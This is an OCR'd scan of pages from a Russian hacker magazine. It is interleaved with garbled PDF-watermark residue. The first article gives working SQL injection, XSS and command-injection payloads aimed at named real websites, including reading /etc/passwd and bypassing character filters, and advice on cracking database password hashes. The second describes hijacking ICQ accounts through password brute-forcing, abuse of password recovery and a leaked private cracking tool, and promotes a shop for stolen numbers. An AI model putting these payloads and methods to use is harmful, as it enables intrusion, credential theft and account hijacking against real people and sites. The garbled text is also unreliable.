Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
56.87 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

взлом

 

BUY

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Наши права в базе =)

случае мускул злобно ругнется (а при слепом инъекте ты увидишь пустую страницу). Однако существенно осложнить твою жизнь может еще и фильтрация определенных символов.

Бывает, что, даже при наличии прав file_priv, прочитать файл не получается из-за фильтрации кавычки. Обойти это можно при помощи char() вот таким запросом:

http://www.iamcal.com/misc/londonbloggers_ v1/station.php?id=-1+union+select+1,2,load_f ile(char(47,101,116,99,47,112,97,115,115,119 ,100)),4,5,6,7,8,9,10,11,12+/*

В результате мы прочитаем /etc/passwd с сервера, на котором хостится ресурс www.iamcal.com. Кстати, для того чтобы вручную не переводить символы в их ASCII-код, я написал нехитрый скриптец, сорец которого лежит на нашем диске =). Если ты думаешь, что сложнее уже некуда, то глубоко ошибаешься. Самый геморрой все еще впереди. Бывает, что в самом запросе, в имени поля, нельзя использовать буквы. На первый взгляд кажется, что ловить здесь абсолютно нечего и надо сворачивать удочки. Но, на самом деле, обойти

фильтрацию можно при помощи aes_decrypt()/aes_encrypt():

http://fat-cat.co.uk/fatcat/artistInfo. php?id=-1+union+select+1,2,3,4,aes_ decrypt(aes_encrypt(user(),0x71),0x71),6+/*

Ответвернетнамлишьоднустрочку—«root@localhost»=). Ещеодинраспространенныйслучай—фильтрацияпробела, которая,к слову,тожеуспешноустраняетсяс путихакерского:). Делов том,чтовместопробеламожноиспользоватькомментарии.Тоестьеслимыхотимподобратьколичествополей

втаблиценаwww.saworship.com,тозапросбудетнетаким:

http://www.saworship.com/article-page. php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*

&Page=singles.php

Авот таким:

http://www.saworship.com/article-page. php?ID=-1/**/union/**/select/**/1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39/*&Page=singles.php

Этот запрос успешно выполнится, и ты увидишь отображаемые поля =). Как ты понял, геморройных ситуаций при проведении инъекций хватает. Иногда получается так, что несколько описанных мной случаев комбинируют между собой. Но главное не паниковать и не опускать руки.

Нестандартныеxss

Теперьнасталовремярассмотретьнестандартныеxss-баги. Чтотакое?Яслышунеодобрительныевозгласыи свистгнилых помидоровс заднихрядов…Зря,товарищи,зря!Тех,ктонесчитаетxssуязвимостью,я попрошуудалиться,ибовсесказанное мнойвывсеравнопропуститемимоушей.Дляостальныхнапомню,чтоприуспешномраскладес помощьюдажепримитив- ногоxss-багапоройможнополучитьпользовательскийаккаунт илидоступк панелиадминистраторасайта.Нов последнее времяполясталифильтроватьвсечаще,и простаяпроверка вида<script>alert('xss')</script>в 80%случаевуженепрока-

тывает.Возьмемпопулярныйв рунетересурсwww.hotel.ru. Полазивнемногополинкам,несложнозаметитьсамописный форум.Нас,собственно,большевсегоинтересуетформочкадля созданиятем/сообщений.Повтыкаввовсеполястандартные

<script>alert('xss')</script>,многиеподумают,чтоxssздесьи не пахло.Ноэтотольконапервыйвзгляд.Вбивjavascript-кодв поле«Сообщение»и присмотревшиськ сорцустранички,можно обнаружить,чтокавычканикакнефильтруется,а переднашим кодомоткрытытэги<TEXTAREA>,<TD>и <TR>:

Причины возникновения хак-геморроя

Как ты уже понял из статьи, все наиболее крупные взломы не обходятся без такого явления, как «хак-гемор», или геморрой при взломе. Причины этого явления кроются, прежде всего, в недружелюбно настроенных по отношению к нам (хакерам) админах. Приведу пример. Не так давно, при взломе сервера достаточно крупной забугорной организации, мне удалось получить и расшифровать хэш рутового пароля к базе. Причем имелась возможность удаленного подключения к БД. Но тут меня ждал облом — файр жестко фильтровал все подключения к открытым портам, разрешая коннект лишь с определенных IP-адресов. Аналогичные правила работали и для 21 го и 22 го портов. Этот факт несомненно огорчил, хотя доступ к интересующей меня базе я в итоге получил, раскрутив слепой инъект и подобрав таблицы с полями. Этот случай лишь подтверждает необходимость использования всех возможных методов при взломе. Ведь если шанс есть, значит, нужно пробовать его реализовать =).

DVD

На дискеты найдешьмойскрипт char.pl,с помощью которогоможнобез лишнегогеморроя преобразоватьсимволыв ихASCII-код.

i

Никогданесдавайся.Ищиновыепути решенияпроблемы. Всепростыепутиуже нашлидотебя.

!

Внимание!Все действиявзломщика противозаконны!Информацияпредставленаисключительно с цельюознакомления!Ни автор,ни редакциязатвои действияответственностиненесут!

На DVD-дискеты найдешьвидеопо взломук статье.

xàêåð 02 /98/ 07

/ 079

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Используем load_file для чтения файлов на сервере

Составленный xss-сплойт успешно пашет

<TR BGCOLOR="#fff2e4"><TD><TEXT AREA NAME="mesg» ROWS=10 COLS=49 class=forms1white style="width:400 "><script>alert('xss')</script></ TEXTAREA></TD></TR>

Тоестьнамнужнозакрытьвсеоткрытыедо нашегоjavascript-кодатэги,послечегоуказатьсам

javascript-код.Выглядетьв html-сорцеэтобудеттак:

<TR BGCOLOR="#fff2e4"><TD>< TEXTAREA NAME="mesg» ROWS=10 COLS=49 class=forms1white style="width:400"></TEXTAREA></ TD></TR><script>alert('xss')</ script></TEXTAREA></TD></TR>

А сам сплойт примет вид:

</TEXTAREA></TD></TR><script>твой_

яваскрипт_код_здесь</script>

Похожуюситуацию,ноужев другомракурсе можнонаблюдатьнасайтеwww.plentyoffish.com. После прохождения в раздел регистрации

(www.plentyoffish.com/register.aspx) и введения в поле пароля символа одинарной кавычки тебя попросят заполнить все поля. Однако, дописав параметр password и придав его значению символ кавычки, мы получим тот же результат. Составляем линк:

http://www.plentyoffish.com/

register.aspx?password=<script>ale

rt('xss')</script>

Нас просят пройти лесом. Хотя, если заглянуть в html-сорец, видно, что сначала необходимо закрыть кавычкой VALUE и указать «>»:

<TD><INPUT class="input" TYPE="input" NAME="Password" VALUE="" SIZE="13" MAXLENGTH="13" style="width: 100px">

Составленный с учетом всех требований, запрос успешно сработает:

http://www.plentyoffish.com/

register.aspx?password="><script>a

lert('xss')</script>

А сам эксплойт получится таким:

"><script>яваскрипт_здесь</script>

Я привел лишь пару случаев. На самом деле, тема xss гораздо глубже, геморроя хватает.

Прочий«головняк»

Помимо всего прочего, часто встречаются и отдельные варианты «головняка». В частности, в перл-скриптах может присутствовать фильтрация пробела. Например, ресурс www.cumcla.orgсодержитбажныйскриптshowfile.cgi. Передавпараметруfilenameзначениеid,мы увидим,чтокомандауспешновыполнилась:

http://www.cumcla.org/cgi-bin/ showfile.cgi?directory=cgibin&filename=|id|

Но выполнение любой из составных команд

(ps -ax, ls -la, uname -a, и т.д.) окажется не-

удачным, так как пробел фильтруется. В перле подобное ограничение можно обойти при помощи $IFS, то есть тебе достаточно поменять

взапросе все имеющиеся пробелы на $IFS.

Втаком случае просмотреть версию операционки на сервере не составит труда:

http://www.cumcla.org/cgi-bin/ showfile.cgi?directory=cgi- bin&filename=|uname$IFS-a|

Еще один неприятный момент — авторизация в админке через .htpasswd. Дело в том, что даже если ты каким-то образом прочитал содержимое .htpasswd, то пасс там в 99% случаев будет лежать в зашифрованном виде. Причем в разных случаях алгоритм шифрования может быть разным. Это связано с тем, что утила htpasswd, идущая в комплекте с Апачем, поддерживает несколько алгоритмов шифрования, а именно — DES (ключ ‘-d’), MD5 (ключ ‘-m’) и SHA (ключ ‘-s’). При наличии на руках примеров хэшей этих алгоритмов, не составит особого труда определить, с каким ключом работает утила htpasswd в конкретно взятом случае.

Такжестоитупомянутьобasp-движках.Здесь следуетопровергнутьмнениео том,чтоaspскриптымогутработатьтолькоподвиндой,как

считаютмногие.Хотяaspxвстречаетсяисключи- тельноподwin,asp-движокнеплохосебячувс- твуети подниксами.Взломуasp-движковбудет посвященамоястатьяв одномизследующих выпусковжурнала,поэтомуподробнозаострять вниманиенаэтомсейчася небуду.Скажулишь, чторасширениюневсегдаможноверить—оно запростоможетоказатьсяфейковым.Кстати, нельзячрезмернодоверятьи баннерам,принадлежащимкрутящимсянасервереслужбам. Грамотныйадминнеобломаетсяизменитьстан- дартноеприветствиеftp/smtp-сервера.Незря говорят:доверяй,нопроверяй.Всегдаследуй этомуправилу.

В заключение обращу твое внимание на получение доступа к базе. Как ты понимаешь, зачастую, даже имея на руках раскрученный инъект, хочется получить полноценного юзера (читай — рута =)) в ломаемой БД. Изначально многое зависит от пользователя, с правами которого работает с базой уязвимый скрипт. Если есть доступ, например, к базе MySQL, то не поленись проверить возможность удаленных подключений к БД (таблица user, поле host). Если такая возможность присутствует — считай, что тебе повезло. Сливай хэш рутового пароля к базе (таблица user, поля user и password). Как правило, пасс бывает

в виде MySQL-хэша (16 символов), но иногда встречается и алгоритм SHA-1. Первый брутится без проблем (смотри утилу в разделе «X-Tools»), а вот с SHA могут возникнуть трудности. Если удаленные подключения запрещены, то я все же советую тебе сбрутить пассы юзеров БД, так как нередки случаи, когда они подходят к ftp. Ну а при отсутствии доступа к базе MySQL, но при наличии прав file_priv, читай конфиги и сорцы, которые могут содержать в себе заветные пароли. Конфиг Апача поможет тебе определить расположение директорий виртуальных хостов :).

Последнееслово

Рассмотреть все случаи в рамках одной статьи нереально. Я обозначил лишь те, которые наиболее часто встречаются в повседневной хакерской жизни. Надеюсь, ты понял, что взлом

— это не просто применение чужих сплойтов, но и реализация своих собственных идей. Всегда борись до последнего и помни — профессионалы никогда не сдаются. z

/ 080

xàêåð 02 /98/ 07

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Goga, 4ever

/ www.newuin.ru /

Всяправда

обICQ

Последние секреты тети Аси

С выхода последних факов и мануалов по ICQ-хакингу прошло довольно много

времени. Что-то осталось, что-то стало неактуальным и кануло в прошлое. Все давно умеют пользоваться ipdBrute, знают, откуда достать базы PM (primary mail) и как их чекать. Поэтому в статье я расскажу о действительно новых тонкостях ICQ-мира.

Свеженькиепятизнаки

Хочу развеять стереотипное представление о том, что абсолютно все пятизнаки регистриро-

вались в бородатом году и пятерок с простыми паролями уже не осталось. В этом, конечно, есть доля правды, но открою тебе один секрет. Как всем известно, пятизнаков отнюдь не 10000-99999, а гораздо меньше — немногим более двух тысяч. Так вот составленная при помощи программы errwolker собственная база «живых» пятизнаков существенно отличается от старой, что выкладывалась на асечке. В новом списке откуда-то появились левые номера, большая часть из которых элитная, наподобие ХХуХХ.

Решив проверить свежак на простейшие пароли, после недолговременного брута я получил весьма неплохой результат: наикрасивейшие пятизнаки «летели» на пароли типа «internet» и даже «12345». Как оказалось, это были номера новых работников ICQ и их друзей. Несмотря на успешный улов, погоду немного портило то, что процент возвращений уина хозяевам был велик, но что-то все же оставалось. Учитывая легкость их добычи, это, в общем-то, устраивало. Расскажу о веселом случае, произошедшем

с моим другом. Он снял номер bcdea на пароль «opress», естественно, поменял его и отложил, но брут продолжал работать, и в листах еще был этот уин. Каково же было его удивление, когда уин снова выпал в бруте, но с уже более простым паролем «susi». Как оказалось, хозяином уина была подруга админа, которая после угона ее номерка поставила пароль еще проще. Так что следи за появившимися пятерками и дерзай ;).

Админыvsасечники

Не секрет, что люди из Мирабилис посещают порталы, посвященные ICQ-хаку. Они прекрасно понимают, что происходит на подобных сайтах, знают адреса наших магазинов и никаких действий не предпринимают. Ведь мы фактически продвигаем их продукт, от асечников они узнают о различных багах, связанных с асей. Но в каждом стаде есть паршивая овца… Одним прекрасным утром я включаю компьютер

ипервым делом захожу в аську. Не проходит

ипяти минут, как на экране выскакивает табличка «Ваш номер используется на другом компьютере». Я сразу понимаю, что аська не угнана. Проверяю статус своего номерка программой ICQinfo и вижу страшное — уин удален из Чекаю уин напарника по магазину — аналогичная ситуация. Я в шоке и некоторое время не могу дать объяснение случившемуся. Иду на форум асечки с надеждой найти там ответы. Вижу тему про анреги, в ней отписались ребята, у которых тоже в этот день убили уины. Топик на форуме в считанные часы разрастается до множества страниц — люди предлагают различные версии причин случившегося, но я колеблюсь между двумя: админы ICQ или турки. Админы стоят под большим вопросом, так как удалили только контактные номера с шопов, а не их содержимое. Могли и турки, так как любят ковыряться и находить баги, к тому же они не особо жалуют русских. На форуме паника, постояльцы скрывают свои уины масками, многие магазины на время прекращают свою деятельность. После долгих расследований причина была

найдена. Сверив логи посещения наших шопов,

мы нашли одинаковый IP. Рефер был из Яндекса по запросу «продажа ICQ-номеров». Whois-сер- вис выдал, что IP принадлежит America Online ICQ. Все стало на свои места, владельцы шопов оперативно забанили сетку AOL’а на своих сайтах и зажили счастливо. Только этот олень все не мог успокоиться: в логах было видно, как он много раз пытается проникнуть на сайт. Видать, что такое прокси, ему никто не говорил. Как потом удалось выяснить, этим админом был Lior Grafi и у него почему-то ненависть к русским. Может, он обиделся, что его старый пятак тыранули и он лежит у нас ;), но странно, почему

его тогда не возвращает.

ICQfishing

Наверняка,многиепользователи,имеющие красивыйномерок,подвергалисьразводкам различных«кис»,«похотливыхпопок»и т.д.

Например,сидишьты,попиваешьпивко,и вдруг с неизвестногоуинаприходитмессагаотнекой обожательницы,мол,тыобязанзайтиподанной ссылкепосмотретьнаеесиськииличто-нибудь скачать.В этотмоментотнехваткиженскогообществатвойподпитыймозгпринимает

решениевсежевзглянутьнафото.Проснувшись утромс головнойболью,тыпытаешьсязайти в асю,нотутвыскакиваетнепонятнаятабличка «Неверныйпароль»,а всетвоипассыулетели

к «неизвестнойдаме».В товремякактыломаешь головунадвосстановлениемпаролейи избавле- ниемотконяги,какой-топаренекоттвоегоимени разводиттвойжеконтакт-лист,занимаетденьги иливпариваеттроя.

Такжечастоспамв аськуимеетпохожийхарактер.

/ 082

xàêåð 02 /98/ 07

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

>> взломto BUY

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

o

 

 

.

 

 

 

 

.c

 

 

 

p

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Логинимся в сервис аттача мыла

Не буду вдаваться в подробности, но хочу пре-

альтернативнымклиентомтипамирандыили&RQ.

что это вполне обдуманные действия мирабов

дупредить хозяев длинных номеров: не стоит

Номеров-невидимок становилось все больше,

с целью обрезать крылышки любителям угонять

думать, что раз номер кривой, то надо ставить

и к концу 2004 года около 30% пяти-, шести-,

номера через праймари-мейл ;).

пароль «123» и он никому не нужен. Для спама,

семи- и восьмизначных номеров были неви-

Следующие изменения произошли 28 марта

флуда и т.д. требуется много уинов, а горя-

димками. Инвизы считаются самыми надежны-

2005 года: при ретриве пароля на номер в обя-

чо любимые мирабы постоянно прижимают

ми номерами, так как невидимость — это гарант

зательном порядке стало нужно устанавливать

ICQ-спамеров и строят разные козни, делая не-

того, что у номера нет примака.

секретные вопросы, после чего праймари-мейл,

реальным авторег кучи уинов. Поэтому сбрутить

Первые интересные изменения в ретриве

с которого их ставили, просто отваливался.

необходимое количество уинов актуальнее.

появились в начале января 2005 года, когда

С этого дня сервис по восстановлению пароля

Для прекращения страданий от назойливого

у всех номеров-невидимок отвалился прайма-

с натяжкой можно было назвать стабильным.

спама из эбаута номера необходимо удалить все

ри-мейл. Наиболее популярным было мнение,

Творились чудеса: праймари у номеров то сами

инфо, кроме ника. Дело в том, что спамерский

что это попросту глюк в базе и праймари

по себе отваливались, то вновь волшебным

софт работает целенаправленно, то есть если

у невидимок отвалился из-за некомпетентности

образом «воскресали», и на них снова можно

в графу «Язык» вписан, например, албанский,

работников ICQ. Я слабо в это верю и считаю,

было отослать пароль. Бывало, страница

а заказчику спама нужен только албанский

 

 

контингент, то твой уин автоматом попадает

Сохраненная страничка

 

под его спам. Кроме того, можно убрать галку

 

 

 

с «Показывать мой статус для веб и поиска»

 

 

(веб-индикация), чтоб цветок был белым.

 

 

PM-базы—эффективныйспособугона?

 

 

Рассмотрим разные новшества, введенные

 

 

мирабами при ретриве. В последнее время ра-

 

 

ботники ICQ так часто что-то меняли в системе

 

 

восстановления пасса, что сами запутались

 

 

и наделали косяков.

 

 

Итак, сама система ретрива образовалась

 

 

в далеком 1999 году, на страничкеICQ.com/

 

 

password появилась возможность высылать

 

 

пароль на вписанный в деталях номера e-mail.

 

 

Система работала стабильно, и особых труд-

 

 

ностей с отправкой пароля не было. Примерно

 

 

в середине 2004 года возникло понятие «но-

 

 

мер-невидимка» — номер, который не виден

 

 

в поиске (ака вайтпагах). При долгой отлежке

 

 

у номера пропадал контакт-лист и все инфо.

 

 

Четко определенного промежутка времени, за

 

 

который неюзаемый номер становился невиди-

 

 

мым, не было: иногда номер исчезал из поиска

 

 

за год, в некоторых случаях и за два номер не

 

 

становился невидимым. Чтобы номер вернулся

 

 

к жизни, нужно было вписать детали в инфо

 

 

номера или же залогиниться в него

 

 

xàêåð 02 /98/ 07

/ 083

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

w Click

to BUY

 

>> взлом

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

!

Ломаяномера мирабов,изохотника легкопревратиться в жертву.Не редки случаи,когдаадмины поIPубиваюткомутопачкуномеров. Настоятельнорекомендуювзламывать тольконезанятые уины.Особеннонедостойныуважения те,ктотырит уины у своих—русских.

i

Сейчассамыми короткимиуинами считаютсяпятизнаки,нораньше существовалитрех- и четырехзначные уины.Онисчитались тестовыминомерами.В настоящее времясуществуют одно-и двузначные уины,ноихнельзя заюзатьстандартным клиентом,этотолько web-сервисные номера.

http://

http://asechka.ru

мощнейшийпроект,посвященный ICQ-хакингу. http://Newuin.ru

отличныймагазин ICQ-номеров,доступ- ныецены.

DVD

На дискеищипрограммы,упомянутые в статье,плюсвспомогательныйсофт.

Привязанный номер

www.ICQ.com/password подолгу не открывалась или зависала на какой-то стадии ретрива.

Более-менее система стабилизировалась в феврале 2006 го. Произошло и еще одно изменение: теперь прай- мари-мейл не отваливался после установки вопросов при условии, если это первый вписанный мейл. И наконец, в июне 2006 го, на радость всех брутеров, отвалились примаки почти у всех, за редким исключением, номеров, вписанных до начала 2006 года. Таким образом, утверждение, что чем старее база, тем она лучше и правдивее, стало неактуальным. Своими действиями работники ICQ добились желаемого: форма ретрива используется по прямому назначению, на мыльные сервисы перестали

лететь тонны пакетов от чекеров. Но недавний баг немного оживил ситуацию.

При серче уина вписанное в детали мыло показывалось независимо от того, стояла галочка «Не показывать адрес емейла» или нет. В момент были собраны новые базы, и новые примаки, которые все скрывали, были в этой базе.

Конечно, выжать из этих баз удалось не особо много, но все же что-то удалось. Безусловно, больше повезло первым из тех, кто прочекал новую базу, в которой накопилось достаточно заброшенных адресов мыла.

IPDSE—брутновогопоколения

Итак, дорогой дружок, ты, наверняка, слышал и, возможно, даже видел и пользовался такой чудесной программой для перебора паролей к уинам (или, говоря человеческим языком, брутом ;)), как Ipdbrute2/udc Lite, или ее модифика-

цией, умеющей автоматически менять пароли на сбрученных номерах, — Ipdbrute2/udc Pro. Но открою тебе небольшой секрет: есть еще и специальная приватная версия, которая именуется Ipdbrute2/udc Pro SE. VKE (автор IPD) не стал ее выкладывать в паблик, а распространил среди своих друзей

ихороших знакомых с наставлением не раздавать ее всем подряд и использовать только для своего блага. Как мы уже выяснили, в каждом стаде есть паршивая овца, и брут не так давно все же просочился в паблик. Тщательный осмотр пациента в нашей IСQ-лаборатории позволил представить тебе отчет, приведенный ниже ;). Итак, смотрим, чем же так хорош этот Ipdbrute2/udc SE и почему 2 года его не рисковали выложить на всеобщее обозрение.

При первом запуске заметно мало отличий от Ipdbrute2/udc Pro, разве что изменилась надпись в шапке с «Ipdbrute2/udc Pro (с) 20002-2003 VKE» на «Ipdbrute2/udc SE (с) 1980-2004»

ив «About» появились приветы от автора небезызвестным на ICQ-сцене личностям. Интерфейс программы не претерпел каких-либо изменений. Теперь посмотрим на саму

Нас поимели :(

работу брута. Во втором издании брут работает через разные серверы ICQ, которые можно редактировать самому в файле macroses.xml. Благодаря этой возможности новый брут выигрывает у своей предыдущей версии, которая логинится только к стандартному серверу на 5190 порту.

Итак, мы взяли 130 скоростных проксей и попробовали угнать какую-нибудь шестизначку на пароль «vegas». Значение threads (потоки) мы выставили в 500, cleanup (отсеивание мертвых проксей) был каждые 30 минут. Количество потоков выставляется методом проб индивидуально под каждый конфиг компа и канал инета.

Теперь посмотрим на сравнительную таблицу работ брутов: Как мы видим, Ipdbrute2/udc Pro значительно проигрывает в скорости Ipdbrute2/udc Pro Se, так что выкидывай свой старый брут и переходи на более продвинутую версию SE. Что касается результата, то в ходе эксперимента было выловлено 26 шестизначек :).

ВсяправдаобадминахICQ

Каждый из нас когда-то думал:

1.На каких же номерах сидят работники ICQ?

2.Могут ли простые смертные сидеть на таких номерах?

3.Реально ли поиметь админа ICQ?

Нам удалось подобраться очень близко к ответам на все эти вопросы.

Отвечаем:

1. На www.newuin.ru/in/cl.txt лежит контакт одного из админов; знакомые говорят, что этот список

самый полный. В группах Co-Workers, Ex-ICQ, General, Support сидят боги ICQ. Отметим несколько групп в его контакте.

Family;342764160;YaelAlon;0

Family;44448;ziv;0

Family;59995;yael sis;0

Пятизнаки xy — жене и ребенку, теще — кривой девятизнак ;).

ICQ uins i give;55515;stanislav - dev;0 ICQ uins i give;87778;Leon - web;0

/ 084

xàêåð 02 /98/ 07

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

E

 

 

 

 

X

 

 

 

 

 

-

 

 

 

 

d

 

 

F

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

>> взломto BUY

 

 

 

